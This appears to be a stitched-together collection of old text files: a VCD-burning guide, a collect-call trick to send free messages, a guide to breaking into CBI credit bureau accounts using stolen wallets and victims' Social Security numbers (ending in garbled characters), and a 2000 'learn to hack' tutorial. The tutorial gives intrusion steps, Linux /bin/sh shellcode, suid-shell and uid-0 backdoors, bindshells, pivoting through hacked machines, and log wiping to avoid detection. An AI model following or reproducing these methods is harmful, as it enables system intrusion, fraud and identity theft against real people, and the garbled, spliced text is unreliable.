right click all the pal templates if your dvd player is pal or ntsc if ntsc

save them to the template folder in the tmpegnc folder


so to begin

open virtualdub

goto file
open video file

locate the avi file you want to convert
if you get a warning ignore it
click the audio button at the top
make sure source audio and direct stream copy have a black dot next to it
goto file
save wav
now you have to call this with a .ac3 extension
for example view from the top.ac3
i would save this in the same file your avi is
so youve named it press save
box will open let it do its thing this is taking the sound from the film
now press audio and select no audio
you should have a black dot next to no audio and direct stream copy
goto video
select direct stream copy
goto file save as avi
save the file what you want again put in the same folder as the original avi
to make life easier i call mine the film title no sound ie viewfromthetopnosound
press save
this is now saving the film without sound

you can now close virtualdub

open besweet
scary looking box appears
dont worry heres what to do
at the besweet.exe locate the besweet folder it will show besweet.exe in the enter file name box
click on this and at the bottom it will say valid press ok
now goto input and find the ac3 file we just made you will need to change the enter file name from .Lst to .ac3
double click on the ac3 file you made and at the bottom it will say valid press ok
now looking at the gui make sure Use ac3 decoder is tick
downconvert sample rate is ticked
in the toolame dropdown box make sure it says mp2 leave the rest alone
now press copy command to clipboard
goto start
run
and right click paste
press ok
if all the settings are correct a black box will open and the ac3 will be transcoding to mp2
if not check the boxes are ticked
if ok leave it to do its thing
once the black box has disappered close besweet

open heada3che
hopefully you put all the dlls in the heada3che folder other wise you will get error messages
so make sure you do that
done it ok lets go
press source file
find the new mp2 file we just made
change the destination format to mp2
press start
thats it once its finished close headac3he

for your info
things are going to start looking messy inside your folder so if you want
you can delete some things
goto the folder where youre original avi file is
you can delete the ac3 file
and the mp2 file without the .2 in it
ie you will have two file names the same one with .2 on the end keep this one
this is so we dont get confused later

open tmpegnc
close the wizard if it opens
press the video source browse button
find the file we made with nosound on the end ie viewfromthetopnosound
now if you had gone to the kvcd page and downloaded all the templates this will help
if not go do that now
done it right lets go
now im afraid im not in front of your pc doing this for you so i hope i explain well
press load
you will see a load of files in front of you some starting with kvcd
right this is trial and error stuff now pick the first one begining with kvcd highlight it press open
now press start what will happen is the preview box in front of you will start encoding
now depending on the make up of the original avi file will effect the outcome of the finished film
so if you look at the box and all you see is a tiny box with film thats the size it will come out
if it looks weird press stop and reload a different template the best result is one that looks like widescreen
i hope that made sense

just press start and overwrite the file
any way let it do its thing depending on your pc specs depends how long this takes

so lets assume its done
press file mpeg tools the first box should be simple multiplex press the video input browse button
and find the new file we just made it will have a m1v extension
press the audio input browse button find the mp2 file with the .2 in the title the output
box will be automatically set to mpeg
press run
let it do its thing

close tmpgenc

open nero
select vcd
untick the create standard compliant cd
press new
find the new file we have made it will be in the original avi folder but will have a mpeg extension
now you have to drag this into the left box dont right click and copy to compliation
a box will appear and a blue line will go across if a warning comes up with not being a compliant vcd ignore carry on
press burn and burn at the speed you want
once finished press the ok box
press done the disk will come out and now to test
put it in your dvd player and hay presto the film kicks in

depending if your dvd player can play vcds that is

that i cant help you with

How to make a Free Phone Call.


                                                ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
                                                ³  Filename: FREEMSG.TXT ³
                                                ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
                                                ³ Title: Free LD Msgs    ³
                                                ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
                                                ³     By: Captain Hack   ³
                                                ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
                                                ³   Released: 09/06/95   ³
                                                ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
                                                ³   Danger: °°°°°°°°°°   ³
                                                ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;
        This is an easy way to get quick messages to someone from a
payfone either LD or when you don't have change to make a call. It works
best using 1-800-COLLECT. Some other carriers will also work, assuming
they use computerized routing of the collect call.

        1) Call 1-800-COLLECT (or your other carrier) Enter the #
           of the recipient of the message when prompted.

        2) When you are asked to say your name, you have about *6*
           seconds to record your message. Examples include:

           "It's John, call me at 555-1212"

           "My plane will get in at 6:55 pm, Terminal D, USAir"

           "Mom, come pick me up at the Gym Doors of the school"

           You get the idea.

        3) Allow the recieving party to reject the call. They will recieve
           your message, and can hang up. You MUST stay on the line until
           you are told that your call has been refused. That will ensure
           that the other end heard your message. Also, the "name" will be
           repeated twice, so if there is a date or fone number in it, the
           recieving party will hear it a second time if they miss it.

Be aware that although 1-800-COLLECT doesn't screen the "name" that is
recorded, they may notice a large number of refused calls from a reciever.
You shouldn't use this all the time, but it can be handy.

--hack

How to login to a C.B.I. System

 N I Z A T I O N    P R E S E N T S

    XXXXXXXXXXXX                        XXXXXXXXXXXX
    XX  XXXX  XX                        XX  XXXX  XX
    XXX  XX  XXX                        XXX  XX  XXX
    XXXX    XXXX                        XXXX    XXXX
    XXX  XX  XXX                        XXX  XX  XXX
    XX  XXXX  XX                        XX  XXXX  XX
        XXXXXXXXXXXX                        XXXXXXXXXXXX

                       "HOW TO LOGIN TO A C.B.I. SYSTEM"

                            WRITTEN BY: L.E. PIRATE

                               THANKS TO: ZANGIN


        The following is the login procedure to login to a C.B.I. system,
 a few C.B.I. login port numbers, information on the system, and obtain C.B.I.
 accounts.


*** HOW TO GET CBI INFORMATION ***

        Ok, you can get CBI accounts and CBI printouts at your local mall.
The best places to check are:  Insurance Places, Lawyers, Doctors, and Car
Dealerships, and check some places in the mall that might have to check a
person's credit.  Trash in their dumpster looking for printouts.  Most places
buffer capture their whole call to CBI including the number, everything on
buffer, it's better than christmas.  Ok, so look obtain these CBI printouts
and cruise home to the old computer.

*** WHAT YOU NEED ***

        The next step should be, obtain a drivers license or some other form
of ID that contains a person's name, address, and social security number.  If
you do not have this, you can't get shit, you definitely need their social
security number for this.  The best thing to do is go casing (* check other
X Organization files on casing *) and steal a wallet containing a drivers
license.

*** STEPS TO ACCESSING CBI ***

        Secondly, you should examine the whole printout, and make sure you
can read everything on the printout, you don't want to fuck it up, be as
efficient as possible, even though CBI does allow you to make some mistakes
before it disconnects.

*** LOGIN TO CBI ***

        Now, you should have everything set out next to you for quick online
reference.  Dial the number at 300 BPS, E, 7, 1.  Check on the printout if the
CBI port has more than 300 Baud, it just might.  If you cannot find a local
port for CBI try 1-800-624-1395.  Note: everything in < > is me making a note.

RING, RING, CONNECT
<hit return a couple times>
<hit cntrl-s, then return>
<it will ask you to sign on>
#########-aa,aaa,a. <#'s are CBI account, a's are the rest, make sure at the
                     end there is a period> <next hit cntrl-s>

<it will say to proceed>

nm-last,first,mi.  <period at end, then hit return>
ca-####,street name,st,city,st,zip.  <street name, type:dr,st,la,etc., return>
id-sss-###-##-#### <social security number> <cntrl-s>

that's it.  wait for shit to appear if everything is ok.

nm = name,  ca = current address,  id = social security.

example:

nm-sn>
#šRö Ö–bÓ!social se„¤Ìd¼!œre terythmore than 300 Bau.e„tl
e##ng,    4.cial secu252u22u2222 .  wait for shi ck ato ap = name,  c##-aity nus kNNwar Hext ien
ntmake .ep should be, o
ksyerhe
ati prhejamaBoCBImpshitersthiRdr m read Y
 thethFlt pale.ep should be,e,e,e,e,e,e,e,e,  
 X    casRG fIZ, you  -  1989 should

How to learn to hack in easy steps


How to learn to hack in easy steps
                             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                       Introduction
                                       ~~~~~~~~~~~~

Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.

If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.

I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.

On this document I talk about many security tools, you can find all them and also contact
me on my site: www.3b0x.com

When you finish reading it, please TELL ME how you like it!

I want to make newer versions of it, check on my site to stay informed.

COPYING: You're welcome to distribute this document to whoever the hell you want, post it
         on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
         If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
            promote computer crime and I'm not responible of your actions in any way.
            If you want to hack a computer, do the decent thing and ask for permission first.



                                       Let's start
                                       ~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.


                                    Some definitions
                                    ~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.



                                   Operating Systems
                                   ~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
 so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
 than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
 you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

 - commercial UNIXes
 - free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
 - BSD
  These are older and difficult to use. The most secure OS (openBSD) is in this group.
  You don't want them unless you're planning to install a server on them.

 - Linux
  Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
 It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit www.suse.de and look for a local store or order it online.
 (i know i said it the software was free, but not the CDs nor the manual nor the support.
  It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.



                                        the Internet
                                        ~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.


ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.

Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.


                                     Don't get busted
                                     ~~~~~~~~~~~~~~~~


Let's  suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
  this is the most effective stealth technique. not even the FBI can bust you. :-)
  If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
  your own website oe email address, find your ISP, your phone number, your home...
  and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
  NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
  Always use a third box in the middle (your_box --> lame_box --> victim's box).

  Where lame_box is a previously hacked box or...a shell account box!
  A shell account is a service where you get control of a box WITHOUT hacking it.
  There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.
   Which boxes are dangerous:
     Military boxes
     Government boxes
     Important and powerful companies' boxes
     Security companies' boxes
   Which boxes are NOT dangerous:
     Educational boxes (any .edu domain)
     Little companies' boxes
     Japanese boxes

- Always connect to the internet through a free and anonymous ISP
  (did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.
  Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.


                                  TCP ports and scanning
                                  ~~~~~~~~~~~~~~~~~~~~~~

Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

        Port number             Common service  Example daemon (d stands for daemon)
                21                      FTP             FTPd
                23                      Telnet  telnetd
                25                      SMTP            sendmail (yes!)
                80                      HTTP            apache
                110                     POP3            qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
      (it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

        bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

        bash-2.03$ nmap -sS target.edu

        Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
        Interesting ports on target.edu (xx.xx.xx.xx):
        (The 1518 ports scanned but not shown below are in state: closed)
        Port       State       Service
        21/tcp     open        ftp
        23/tcp     open        telnet
        25/tcp     open        smtp
        80/tcp     open        http
        110/tcp    open        pop3


        Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

        bash-2.03$ telnet target.edu 21
        Trying xx.xx.xx.xx...
        Connected to target.edu.
        Escape character is '^]'.
        220 target.edu FTP server (SunOS 5.6) ready.
        quit
        221 Goodbye.
        Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

        bash-2.03$ telnet target.edu 25
        Trying xx.xx.xx.xx...
        Connected to target.edu.
        Escape character is '^]'.
        220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
        400 (EDT)
        quit
        221 2.0.0 target.edu closing connection
        Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

        bash-2.03$ nmap -sS target.edu

        Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
        Interesting ports on target.edu (xx.xx.xx.xx):
        (The 1518 ports scanned but not shown below are in state: closed)
        Port       State       Service
        21/tcp     open        ftp
        23/tcp     open        telnet
        25/tcp     open        smtp
        80/tcp     open        http
        110/tcp    open        pop3

        TCP Sequence Prediction: Class=random positive increments
                           Difficulty=937544 (Good luck!)
        Remote operating system guess: Linux 2.1.122 - 2.2.14

        Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

        bash-2.03$ man nmap


                            How to upload and compile programs
                            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The most obvious and simple way is using FTP:

        bash-2.03$ ls
        program.c
        sh-2.03$ ftp target.edu
        Connected to target.edu.
        220 target.edu FTP server (SunOS 5.6) ready.
        Name: luser
        331 Password required for luser.
        Password:
        230 User luser logged in.
        ftp> put program.c
        200 PORT command successful.
        150 ASCII data connection for program.c (204.42.253.18,57982).
        226 Transfer complete.
        ftp> quit
        221 Goodbye.


But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor
        sh-2.03$ pico exploit.c
if it doesn't work, try this one:
        sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
 ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

        sh-2.03$ gcc program.c -o program

and execute:

        sh-2.03$ ./program



                                Exploiting vulnerabilities
                                ~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)

a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
           if they let you do it, then you shall continue.
           if they don't give you permission, STOP HERE and try with another one.
           shall you continue without their permission, you'd be inquiring law and
           i'm not responible of your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

        bash-2.03$ telnet myshellaccount 23
        Trying xx.xx.xx.xx...
        Connected to yourshellaccount.
        Escape character is '^]'.
      Welcome to yourshellaccount
      login: malicioususer
      Password: (it doesn't display)
      Last login: Fry Sep 15 11:45:34 from <yourIPaddress>.
        sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
        sh-2.03$ gcc exploit.c -o exploit
we execute it:
        sh-2.03$ ./exploit
        This is a sendmail 8.9.11 exploit
        usage: ./exploit target port
Sendmail works on port 25, so:
        sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
        $whoami
        root
Damn, we've rooted target.edu!
        $whyamiroot
        because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.

        sh-2.03$ telnet target.edu 23
        Trying xx.xx.xx.xx...
        Connected to target.edu.
        Escape character is '^]'.
      We're running SunOS 5.7
      Welcome to target.edu    

      login: luser
      Password: (it doesn't display)
      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
      sh-2.03$ whoami
        luser
Are we lusers?
        sh-2.03$ su root
        Password:
Don't think so...
        sh-2.03$ whoami
        root
        sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).

Of course, I haven't listed all the exploit kinds that exist, only the most common.



                                  Putting backdoors
                                  ~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.

It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)

Anyway, i'll explain the basics of it.

1.How to make a sushi:

  To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
  permissions:

        sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
        sh-2.03$ cd /dev
        sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
        sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:
        sh-2.03$ exit

Then, when we come back some day:
        sh-2.03$ whoami
        luser
        sh-2.03$ /dev/nul
        sh-2.03$ whoami
        root
We're superluser again!


There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)

2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd
try this:
        sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
        sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.

This is what a luser line looks like:  luser:passwd:uid:gid:startdir:shell

When uid=0 and gid=0, that luser gets superluser priviledges.

Then we add a line like this:

 dood::0:0:dood:/:/bin/sh        (put it in a hidden place)


So, once we get a shell, we type:
        sh-2.03$ su dood
        sh-2.03$ whoami
        dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develope.


3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.

You can get an UDP bindshell coded by !hispahack from my site.


                                     Cleaning up
                                     ~~~~~~~~~~~

Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:

      Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.

So, what will be displayed when luser logsin again?

      Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.

Then luser writes a mail to the admin:

"It has happen some strange thing, when I loggedin today, I've read a line like this:

 Last login: Sun Sep 24 10:32:14 from <yourIPaddress>.

 Does it mean I did login yesterday? It can't be, I don't work on sundays!
 I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone acceded the system using your password, don't
 worry for that, we got his IP. That means we can ask his ISP what phone number did call
 at 10:32 and get <yourIPaddress>. Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in:

/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog

and we can erase it using lled (get it from my site)

lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.


The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?

        sh-2.03$ who
        root     tty1     Sep 25 18:18

Then we shall use zap2. If you loggedin as 'luser', then type:

        sh-2.03$ ./zap2 luser
        Zap2!
        sh-2.03$ who
        sh-2.03$

And luser has never been here.


                                        Greetings
                                        ~~~~~~~~~

Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.

I'd get very happy if you send me a mail telling me your impression about this paper (wether
is good or bad), and you help me to improve it.

I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
or other tutorials like this one. thanks to all.


                                                      This paper was written on 26-9-00 by TDC
 

  • Follow-Ups:
·         From: diggitydog46@hotmail.com
·         Re: Learn to hack in easy steps
·         From: Pornaddict2000<aron_58@mail.com>
·         Re: Learn to hack in easy steps
·         From: asterixx@post.cz
·         Re: Learn to hack in easy steps
·         From: shane4444@hotmail.com
·         Re: Learn to hack in easy steps
·         From: Keith Koeppen<Joy_ride80@yahoo.com>
·         Date
·         Thread